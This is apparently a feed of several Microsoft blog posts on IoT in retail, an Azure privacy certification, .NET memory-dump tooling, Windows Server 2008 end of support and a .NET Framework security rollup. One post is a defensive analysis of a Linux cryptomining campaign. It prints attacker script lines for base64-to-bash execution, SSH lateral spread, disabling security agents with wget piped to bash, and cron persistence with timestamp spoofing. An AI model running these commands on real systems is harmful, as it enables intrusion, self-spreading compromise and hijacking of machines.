“The real power comes in the combination of C.H. Robinson’s Navisphere Vision, technology that is built by and for supply chain experts, and the speed, security, and connectivity of Azure IoT Central.” - Chris Cutshaw, Director of Commercial and Product Strategy at TMC

Learn more about the results from the recent holiday season and what Navisphere Vision can do for global supply chain visibility in the case story.

Navisphere Vision dashboard showing IoT Sensors activity, managed through Azure IoT Central.

Getting started

NRF 2020: Retail's Big Show is happening in Manhattan from January 12 to 14. Azure IoT and other experts including retail solution builders Attabotics, C.H. Robinson, and CIRT will be in attendance.

Read more about the IoT Signals for Retail report.

Get started with Azure IoT Central today.

Learn more about the solutions being used by these customers today.


Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries.

    Azure is now certified for the ISO/IEC 27701 privacy standard


    We are pleased to share that Azure is the first major US cloud provider to achieve certification as a data processor for the new international standard ISO/IEC 27701 Privacy Information Management System (PIMS). The PIMS certification demonstrates that Azure provides a comprehensive set of management and operational controls that can help your organization demonstrate compliance with privacy laws and regulations. Microsoft’s successful audit can also help enable Azure customers to build upon our certification and seek their own certification to more easily comply with an ever-increasing number of global privacy requirements.

    Being the first major US cloud provider to achieve a PIMS certification is the latest in a series of privacy firsts for Azure, including being the first to achieve compliance with EU Model clauses. Microsoft was also the first major cloud provider to voluntarily extend the core data privacy rights included in the GDPR (General Data Protection Regulation) to customers around the world.

    PIMS is built as an extension of the widely-used ISO/IEC 27001 standard for information security management, making the implementation of PIMS’s privacy information management system a helpful compliance extension for the many organizations that rely on ISO/IEC 27001, as well as creating a strong integration point for aligning security and privacy controls. PIMS accomplishes this through a framework for managing personal data that can be used by both data controllers and data processors, a key distinction for GDPR compliance. In addition, any PIMS audit requires the organization to declare applicable laws/regulations in its criteria for the audit, meaning that the standard can be mapped to many of the requirements under GDPR, CCPA (California Consumer Privacy Act), or other laws. This universal framework allows organizations to efficiently operationalize compliance with new regulatory requirements.

    PIMS also helps customers by providing a template for implementing compliance with new privacy regulations, helping reduce the need for multiple certifications and audits against new requirements and thereby saving both time and money. This will be critical for supply chain business relationships as well as cross-border data movement. 

    This short video demonstrates how Microsoft complies with ISO/IEC 27701 and how our compliance benefits customers.

    Schellman & Company LLC issued a certificate of registration for ISO/IEC 27701:2019 that covers the requirements, controls, and guidelines for implementing a privacy information security management system as an extension to ISO/IEC 27001:2013 for privacy management as a personally identifiable information (PII) processor relevant to the information security management system supporting Microsoft Azure, Dynamics, and other online services that are deployed in Azure Public, Government cloud, and Germany Cloud, including their development, operations, and infrastructures and their associated security, privacy, and compliance per the statement of applicability version 2019-02. A copy of the certification is available on the Service Trust Portal.

    Modern business is driven by digital transformation, including the ability to deeply understand data and unlock the power of big data analytics and AI. But before customers – and regulators – will allow you to leverage this data, you must first win their trust. Microsoft simplifies this privacy burden with tools that can help you automate privacy, including built-in controls like PIMS. 

    Microsoft has longstanding commitments to privacy, and we continue to take steps to give customers more control over their data. Our Trusted Cloud is built on our commitments to privacy, security, transparency, and compliance, and our Trust Center provides access to validated audit reports, data management capabilities, and information about the number of legal demands we received for customer data from law enforcement.

    IoT Signals retail report: IoT’s promise for retail will be unlocked addressing security, privacy and compliance


    Few industries have been disrupted by emerging technology quite like retail. From exploding online sales to the growth of mobile shopping, the industry has made a permanent shift to accommodate digital consumers.

    The rise of IoT has forced the retail industry to take notice; IDC expects that by 2025 there will be 41.6 billion connected IoT devices or ‘things,’ generating more than 79 zettabytes (ZB) of data. These billions of devices are creating unprecedented visibility into a business, leading to transformation of operations, from the supply chain to automated checkout, personalized discounts, smart shelves, and other advances powered by IoT. In fact, IoT can help brick-and-mortar stores create customer experiences that rival that of online stores; for instance, customers can be sent alerts about discounts relevant to them when they get close to a store, and those stores can use IoT to keep track of inventory and increase efficiency.

    Today we're sharing a new IoT Signals report focused on the retail industry that provides an industry pulse on the state of IoT adoption to help inform how we better serve our partners and customers, as well as help retail leaders develop their own IoT strategies. We surveyed 168 decision makers in enterprise retail organizations to deliver an industry-level view of the IoT ecosystem, including adoption rates, related technology trends, challenges, and benefits of IoT.

    The study found that while IoT is almost universally adopted in retail and considered critical to success, companies are challenged by compliance, privacy concerns, and skills shortages. To summarize the findings:

    1. Retail IoT is strong and improving customer experience is a growth opportunity. Retailers’ future planning focuses on IoT projects that help customers get in and out quickly, which increases revenue. Areas like automated checkout and optimizing inventory and layout are key, and survey respondents rank store analytics (57 percent) and supply chain optimization and inventory tracking (48 percent) as the top two IoT use cases.
    2. AI is integral to IoT and retailers who incorporate it achieve greater IoT success. For many retail IoT decision makers (44 percent), AI is a core component of their IoT solutions. Furthermore, retailers who leverage AI say they are able to use their IoT solutions more quickly and more fully. They also plan to use IoT even more in the future than those not integrating AI. Those surveyed who use AI as a core part of their solutions are more likely to use it for layout optimization, digital signage, smart shelving, and in-store contextualized marketing (including beacons).
    3. Across regions, unique retail benefits and challenges emerge around IoT, but all are committed. Globally, IoT is being widely adopted in retail, with the survey respondents in the US, UK, and France all reporting 92 percent IoT adoption. In the US, IoT is often utilized for security and store analytics (65 percent each), while store analytics (49 percent) and supply chain and store optimization (43 percent) are more popular uses in Europe. Despite a variety of adoption barriers across regions, retailers are dedicated to overcoming challenges and leveraging IoT even more in the future.
    4. IoT is seen as critical to retail business success. Nearly 9 in 10 (87 percent) surveyed consider IoT as critical to their business success. Looking forward, respondents believe the biggest benefits they will see from IoT adoption include increased efficiency (69 percent), cost savings (64 percent), increased competitive advantage (62 percent), and new revenue streams (56 percent).
    5. The biggest barriers to success for retailers include budget, privacy concerns, compliance challenges, and talent. In the US, the top three concerns of retailers surveyed are a lack of budget, consumer privacy concerns, and lack of technical knowledge. In Europe, compliance and regulatory challenges top the list, followed by human resources and timing and deployment issues. Despite these challenges, the future of IoT looks bright, with 82 percent of US and 73 percent of European respondents anticipating greater IoT implementation in the future.

    Microsoft is leading the charge to address these IoT challenges

    We're committed to helping retail customers bring their vision to life with IoT, and this starts with simplifying and securing IoT. Our customers are embracing IoT as a core strategy to drive better business outcomes, and we are heavily investing in this space, committing $5 billion to IoT and intelligent edge innovation by 2022 and growing our IoT and intelligent edge partner ecosystem to over 10,000 partners.

    We're dramatically simplifying IoT to enable every business on the planet to benefit. We have the most comprehensive and complete IoT platform and are going beyond that to simplify IoT. Some key examples include Azure IoT Central, which enables customers and partners to provision an IoT app in seconds, customize it in hours, and go to production the same day. To help ensure that retailers have a robust talent pool of IoT developers, we've developed both an IoT School and an AI School, which provide free training for common application patterns and deployments.

    Security is crucial for trust and integrity in IoT cloud- and edge-connected devices because they may not always be in trusted custody. Azure Sphere takes a holistic security approach from silicon to cloud, providing a highly secure solution for connected microcontroller units (MCUs), which go into devices ranging from connected home devices to medical and industrial equipment. Azure Security Center provides unified security management and advanced threat protection for systems running in the cloud and on the edge.

    Finally, we're helping our retail customers leverage their IoT investments with AI at the intelligent edge. Azure IoT Edge enables customers to distribute cloud intelligence to run in isolation on IoT devices directly, and Azure Data Box Edge builds on Azure IoT Edge and adds virtual machine and mass storage support. Going forward, Azure Digital Twins (currently in preview) will enable retailers to create complete virtual models of physical environments, making it easy to unlock insights into their retail environments.

    When IoT is foundational to a retailer’s transformation strategy, it can have a significantly positive impact on the bottom line, customer experiences, and products. We are invested in helping our partners, customers, and the broader industry to take the necessary steps to address barriers to success. Read the full IoT Signals Retail Report and learn how we are helping retailers embrace the future and unlock new opportunities with IoT.


    Collecting and analyzing memory dumps


    Building upon the diagnostics improvements introduced in .NET Core 3.1, we’ve introduced a new tool for collecting heap dumps from a running .NET Core process.

    In a previous blog post, we introduced dotnet-dump, a tool that allows you to capture and analyze process dumps. Since then, we've been hard at work improving the experience when working with dumps.

    Two of the key improvements we’ve made to dotnet-dump are:

    • We no longer require sudo for collecting dumps on Linux
    • dotnet dump analyze is now supported on Windows

    GC dumps

    However, one of the key limitations that remains is that process dumps are not portable. It is not possible to diagnose dumps collected on Linux on Windows, and vice versa.

    Many common scenarios don't require a full process dump inspection. To enable these scenarios, we've introduced a new lightweight mechanism for collecting a dump that is portable. By triggering a garbage collection in the target process, we are able to stream events emitted by the garbage collector via the existing EventPipe mechanism to regenerate a graph of object roots from those events.

    These GC dumps are useful for several scenarios including:

    • Comparing number of objects by type on the heap
    • Analyzing object roots
    • Finding what objects have a reference to what type
    • Other statistical analysis about objects on the heap

    dotnet-gcdump

    In .NET Core 3.1, we're introducing a new tool that allows you to capture the aforementioned GC dumps for analysis in PerfView and Visual Studio.

    You can install this .NET global tool by running the following command:

    dotnet tool install --global dotnet-gcdump
    

    Once you’ve installed dotnet gcdump, you can capture a GC dump by running the following command:

    dotnet gcdump collect -p <target-process-PID>
    

    Note: Collecting a gcdump triggers a full Gen 2 garbage collection in the target process and can change the performance characteristics of your application. The duration of the GC pause experienced by the application is proportional to the size of the GC heap; applications with larger heaps will experience longer pauses.

    The resulting .gcdump file can be analyzed in Visual Studio and PerfView on Windows.

    Analyzing GC dumps in Visual Studio

    The collected GC dumps can be analyzed by opening the .gcdump files in Visual Studio. Upon opening in Visual Studio, you are greeted with the Memory Analysis Report page.

    Memory analysis report in Visual Studio 2019

    The top pane shows the count and size of the types in the snapshot, including the size of all objects that are referenced by the type (Inclusive Size).

    In the bottom pane, the Paths to Root tree displays the objects that reference the type selected in the upper pane. The Referenced Types tree displays the references that are held by the type selected in the upper pane.

    In addition to the memory analysis report of just a single GC dump, Visual Studio also allows you to compare two gc dumps. To view details of the difference between the current snapshot and the previous snapshot, navigate to the Compare To section of the report and select another GC dump to serve as the baseline.

    Memory analysis comparison in Visual Studio 2019

    Closing

    Thanks for trying out the new diagnostics tools in .NET Core 3.1. Please continue to give us feedback, either in the comments or on GitHub. We are listening carefully and will continue to make changes based on your feedback.

    The post Collecting and analyzing memory dumps appeared first on .NET Blog.

    Turning to a new chapter of Windows Server innovation


    Today, January 14, 2020, marks the end of support for Windows Server 2008 and Windows Server 2008 R2. Customers loved these releases, which introduced advancements such as the shift from 32-bit to 64-bit computing and server virtualization. While support for these popular releases ends today, we are excited about new innovations in cloud computing, hybrid cloud, and data that can help server workloads get ready for the new era.

    We want to thank customers for trusting Microsoft as their technology partner. We also want to make sure that we work with all our customers to support them through this transition while applying the latest technology innovations to modernize their server workloads.

    We are pleased to offer multiple options as you make this transition. Learn how you can take advantage of cloud computing in combination with Windows Server. Here are some of our customers that are using Azure for their Windows Server workloads.

    Customers using Azure for their Windows Server workloads

    Customers such as Allscripts, Tencent, Alaska Airlines, and Altair Engineering are using Azure to modernize their apps and services. One great example of this is from JB Hunt Transport Services, Inc., which has over 3.5 million trucks on the road every single day.

    See how JB Hunt has driven their digital transformation with Azure:

    JB Hunt truck, linking to video

    How you can take advantage of Azure for your Windows Server workloads

    You can deploy Windows Server workloads in Azure in various ways such as Azure Virtual Machines (VMs), Azure VMware Services, and Azure Dedicated Hosts. You can apply Azure Hybrid Benefit to use existing Windows Server licenses in Azure. The benefits are immediate and tangible: Azure Hybrid Benefit alone saves 40 percent in cost. Use the Azure Total Cost of Ownership Calculator to estimate your savings by migrating your workloads to Azure.

    As you transition your Windows Server workloads to the cloud, Azure offers additional app modernization options. For example, you can migrate Remote Desktop Services to Windows Virtual Desktop on Azure, which offers the best virtual desktop experience, multi-session Windows 10, and elastic scale. You can migrate on-premises SQL Server to Azure SQL Database, which offers Hyperscale, artificial intelligence, and advanced threat detection to modernize and secure your databases. Plus, you can future-proof your apps with no more patching and upgrades, which is a huge benefit to many IT organizations.

    Free extended security updates on Azure

    We understand comprehensive upgrades are traditionally a time-consuming process for many organizations. To ensure that you can continue to protect your workloads, you can take advantage of three years of extended security updates, which you can learn more about here, for your Windows Server 2008 and Windows Server 2008 R2 servers only on Azure. This will allow you more time to plan the transition paths for your business-critical apps and services.

    How you can take advantage of latest innovations in Windows Server on-premises

    If your business model requires that your servers must stay on-premises, we recommend upgrading to the latest Windows Server.

    Windows Server 2019 is the latest and the most quickly adopted Windows Server version ever. Millions of instances have been deployed by customers worldwide. Hybrid capabilities of Windows Server 2019 have been designed to help customers integrate Windows Server on-premises with Azure on their own terms. Windows Server 2019 adds additional layers of security such as Windows Defender Advanced Threat Protection (ATP) and Defender Exploit Guard, which improves even further when you connect to Azure. With Kubernetes support for Windows containers, you can deploy modern-containerized Windows apps on premises or on Azure.

    With Windows Server running on-premises, you can still leverage Azure services for backup, update management, monitoring, and security. To learn how you can start using these capabilities, we recommend trying Windows Admin Center – a free, browser-based app included as part of Windows Server licenses that makes server management easier than ever.

    Start innovating with your Windows Server workloads

    Getting started with the latest release of Windows Server 2019 has never been easier.

    Today also marks the end of support for Windows 7. To learn more, visit the Microsoft 365 blog.

    Learning from cryptocurrency mining attack scripts on Linux


    Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers. In the past, we've talked about how some attackers use brute force techniques to guess account names and passwords and use those to gain access to machines. Today, we're talking about an attack that a few of our customers have seen where a service is exploited to run the attacker's code directly on the machine hosting the service.

    This attack is interesting for several reasons. The attacker echoes their scripts into bash, so we can see what they want to do, not just what executes on the machine. The scripts cover a wide range of possible services to exploit, so they demonstrate how far the campaign can reach. Finally, because we have the scripts themselves, we can pull out good examples from the Lateral Movement, Defense Evasion, Persistence, and Objectives sections of the Linux MITRE ATT&CK Matrix and use those to talk about hunting on your own data.

    Initial vector

    For this attack, the first indication something is wrong in the audited logs is an echo command piping a base64 encoded command into base64 for decoding then piping into bash. Across our users, this first command has a parent process of an application or service exposed to the internet and the command is run by the user account associated with that process. This indicates the application or service itself was exploited in order to run the commands. While some of these accounts are specific to a customer, we also see common accounts like Ubuntu, Jenkins, and Hadoop being used. 

    /bin/sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYm

    luOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K<snip>CmRvbm

    UK|base64 -d|bash"

    Scripts

    It is worth taking a brief aside to talk about how this attacker uses scripts. In this case, they do nearly everything through base64 encoded scripts. One of the interesting things about those scripts is they start with the same first two lines: redirecting both the standard error and standard output stream to /dev/null and setting the path variable to locations the attacker knows generally hold the system commands they want to run. 

    exec &>/dev/null
    export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

    This indicates that when each of them is base64 encoded, the first part of the encoding is the same every time.

    ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYm

    luOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K

    The use of the same command is particularly helpful when trying to tie attacks together across a large set of machines. The scripts themselves are also interesting because we can see what the attacker intended to run. As defenders, it can be very valuable to look at attacker scripts whenever you can so you can see how they are trying to manipulate systems. For instance, this attacker uses a for loop to cycle through different possible domain names. This type of insight gives defenders more data to pivot on during an investigation.

    for h in onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to
    do
    if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then
    x t<snip>v.$h
    else
    break
    fi
    done

    We observed this attacker use over thirty different encoded scripts across a number of customers, but they boiled down to roughly a dozen basic scripts with small differences in executable names or download sites. Within those scripts are some interesting examples that we can tie directly to the MITRE ATT&CK Matrix for Linux.

    Lateral Movement

    While it isn’t the first thing the attacker does, they do use an interesting combination of Discovery (T1018: Remote System Discovery) and Lateral Movement (T1021: Remote Services) techniques to infect other hosts. They grep through the files .bash_history, /etc/hosts, and .ssh/known_hosts looking for IP addresses. They then attempt to pass their initial encoded script into each host using both the root account and the account they compromised on their current host without a password. Note, the xssh function appears before the call in the original script.

    hosts=$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |awk -F: {'print $2'}|sort|uniq ;awk {'print $1'} $HOME/.ssh/known_hosts|sort|uniq|grep -v =|sort|uniq)
    for h in $hosts;do xssh root $h; xssh $USER $h & done
    ------
    xssh() {
    ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ZXhlYyA<snip>KZG9uZQo=|base64 -d|bash'
    }

    In each case, after the initial foothold is gained, the attacker uses a similar set of Defense Evasion techniques.

    Defense Evasion

    Over various scripts, the attacker uses the T1107: File Deletion, T1222: File and Directory Permissions Modification, and T1089: Disabling Security Tools techniques, as well as the obvious by this point, T1064: Scripting.

    In one script, they first make a randomly named file:

    z=./$(date|md5sum|cut -f1 -d" ")

    After they download their executable into that file, they modify the downloaded file for execution, run it, then delete the file from disk:

    chmod +x $z;$z;rm -f

    In another script, the attacker tries to download then run uninstall files for the Alibaba Cloud Security Server Guard and the AliCloud CloudMonitor service (the variable $w is set as a wget command earlier in the script).

    $w update.aegis.aliyun.com/download/uninstall.sh|bash
    $w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
    /usr/local/qcloud/stargate/admin/uninstall.sh

    Persistence

    Once the coin miner is up and running, this attacker uses a combination of T1168: Local Job Scheduling and T1501: Systemd Service scheduled tasks for persistence. The below is taken from another part of a script where they echo an ntp call and one of their base64 encoded scripts into the file systemd-ntpdate then add a cron job to run that file. The encoded script here is basically the same as their original script that started off the intrusion.

    echo -e "#\x21/bin/bash\nexec &>/dev/null\nntpdate ntp.aliyun.com\nsleep $((RANDOM % 600))\necho ZXhlYyAmPi9<snip>2gKZmkK|base64 -d|bash" > /lib/systemd/systemd-ntpdate
    echo "0 * * * * root /lib/systemd/systemd-ntpdate" > /etc/cron.d/0systemd-ntpdate
    touch -r /bin/grep /lib/systemd/systemd-ntpdate
    touch -r /bin/grep /etc/cron.d/0systemd-ntpdate
    chmod +x /lib/systemd/systemd-ntpdate

    Objectives

    As previously mentioned, the main objective of this attacker is to get a coin miner started. They do this in the very first script that is run using the T1496: Resource Hijacking tactic. One of the interesting things about this attack is that while they start by trying to get the coin miner going with the initially compromised account, one of the subsequent scripts attempts to get it started using commands from different pieces of software (T1072: Third-party Software).

    ansible all -m shell -a 'echo ZXh<snip>uZQo=|base64 -d|bash'
    knife ssh 'name:*' 'echo ZXh<snip>uZQo=|base64 -d|bash'
    salt '*' cmd.run 'echo ZXh<snip>ZQo=|base64 -d|bash'

    Hunting

    Azure Security Center (ASC) Linux customers should expect to see coin mining or suspicious download alerts from this type of activity, but what if you wanted to hunt for it yourself? If you use the above script examples, there are several indicators you could follow up on, especially if you have command line logging.

    • Do you see unexpected connections to onion and tor sites?
    • Do you see unexpected ssh connections between hosts?
    • Do you see an increase in activity from a particular user?
    • Do you see base64 commands echoed, decoded, then piped into bash? Any one of those could be suspicious depending on your own network.
    • Check your cron jobs, do you see wgets or base64 encoded lines there?
    • Check the services running on your machines, do you see anything unexpected?
    • In reference to the Objectives section above, do you see commands for pieces of software you don’t have installed?

    Azure Sentinel can help with your hunting as well. If you are an Azure Security Center customer already, we make it easy to integrate into Azure Sentinel.

    Defense

    In addition to hunting, there are a few things you can do to defend yourself from these types of attacks. If you have internet-facing services, make sure you are keeping them up to date, are changing any default passwords, and are taking advantage of some of the other credential management tools Azure offers, like just-in-time (JIT) access, password-less sign-in, and Azure Key Vault. Monitor your Azure machine utilization rates; an unexpected increase in usage could indicate a coin miner. Check out other ideas on the Azure Security Center documentation page.

    Identifying attacks on Linux systems

    Coin miners represent a continuing threat to machines exposed to the internet. While it's generally easy to block a known-bad IP or use a signature-based antivirus, by studying attacker tactics, techniques, and procedures, defenders can find new and more reliable ways to protect their environments.

    While we talk about a specific coin miner attacker in this post, the basic techniques highlighted above are used by many different types of attackers of Linux systems. We see Lateral movement, Defense Evasion, and Persistence techniques similar to the above used by different attackers regularly and are continually adding new detections based on our investigations.

    Windows 7 support ends today, and Windows 10 is better than ever

    .NET Framework January Security and Quality Rollup


    Today, we are releasing the January 2020 Security and Quality Rollup Updates for .NET Framework.

    Security

    CVE-2020-0605, CVE-2020-0606, CVE-2020-0646 – .NET Framework Remote Code Execution

    A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

    To learn more about the vulnerabilities, see the Common Vulnerabilities and Exposures (CVE) entries listed above.

    Quality and Reliability

    This release contains no new quality and reliability improvements.

    The Security and Quality Rollup is available via Windows Update, Windows Server Update Services, and Microsoft Update Catalog. The Security Only Update is available via Windows Server Update Services and Microsoft Update Catalog.

    Microsoft Update Catalog

    You can get the update via the Microsoft Update Catalog. For Windows 10, .NET Framework 4.8 updates are available via Windows Update, Windows Server Update Services, and the Microsoft Update Catalog. Updates for other versions of .NET Framework are part of the Windows 10 Monthly Cumulative Update.

    Note: Customers that rely on Windows Update and Windows Server Update Services will automatically receive the .NET Framework version-specific updates. Advanced system administrators can also make use of the direct Microsoft Update Catalog download links below for .NET Framework-specific updates. Before applying these updates, please carefully review the .NET Framework version applicability to ensure that you only install updates on systems where they apply.

    The following table is for Windows 10 and Windows Server 2016+ versions.

    Product Version | Cumulative Update
    Windows 10 1909 and Windows Server, version 1909 |
        .NET Framework 3.5, 4.8 | Catalog 4532938
    Windows 10 1903 and Windows Server, version 1903 |
        .NET Framework 3.5, 4.8 | Catalog 4532938
    Windows 10 1809 (October 2018 Update) and Windows Server 2019 | 4535101
        .NET Framework 3.5, 4.7.2 | Catalog 4532947
        .NET Framework 3.5, 4.8 | Catalog 4532937
    Windows 10 1803 (April 2018 Update) |
        .NET Framework 3.5, 4.7.2 | Catalog 4534293
        .NET Framework 4.8 | Catalog 4532936
    Windows 10 1709 (Fall Creators Update) |
        .NET Framework 3.5, 4.7.1, 4.7.2 | Catalog 4534276
        .NET Framework 4.8 | Catalog 4532935
    Windows 10 1703 (Creators Update) |
        .NET Framework 3.5, 4.7, 4.7.1, 4.7.2 | Catalog 4534296
        .NET Framework 4.8 | Catalog 4532934
    Windows 10 1607 (Anniversary Update) and Windows Server 2016 |
        .NET Framework 3.5, 4.6.2, 4.7, 4.7.1, 4.7.2 | Catalog 4534271
        .NET Framework 4.8 | Catalog 4532933
    Windows 10 1507 |
        .NET Framework 3.5, 4.6, 4.6.1, 4.6.2 | Catalog 4534306

    The following table is for earlier Windows and Windows Server versions.

    Product Version | Security and Quality Rollup | Security Only Update
    Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 | 4535104 | 4534978
        .NET Framework 3.5 | Catalog 4532946 | Catalog 4532961
        .NET Framework 4.5.2 | Catalog 4532927 | Catalog 4532962
        .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 | Catalog 4532931 | Catalog 4532970
        .NET Framework 4.8 | Catalog 4532940 | Catalog 4532951
    Windows Server 2012 | 4535103 | 4534977
        .NET Framework 3.5 | Catalog 4532943 | Catalog 4532958
        .NET Framework 4.5.2 | Catalog 4532928 | Catalog 4532963
        .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 | Catalog 4532930 | Catalog 4532969
        .NET Framework 4.8 | Catalog 4532939 | Catalog 4532950
    Windows 7 SP1 and Windows Server 2008 R2 SP1 | 4535102 | 4534976
        .NET Framework 3.5.1 | Catalog 4532945 | Catalog 4532960
        .NET Framework 4.5.2 | Catalog 4532929 | Catalog 4532964
        .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 | Catalog 4532932 | Catalog 4532971
        .NET Framework 4.8 | Catalog 4532941 | Catalog 4532952
    Windows Server 2008 | 4535105 | 4534979
        .NET Framework 2.0, 3.0 | Catalog 4532944 | Catalog 4532959
        .NET Framework 4.5.2 | Catalog 4532929 | Catalog 4532964
        .NET Framework 4.6 | Catalog 4532932 | Catalog 4532971

    Previous Monthly Rollups

    The last few .NET Framework Monthly updates are listed below for your convenience:

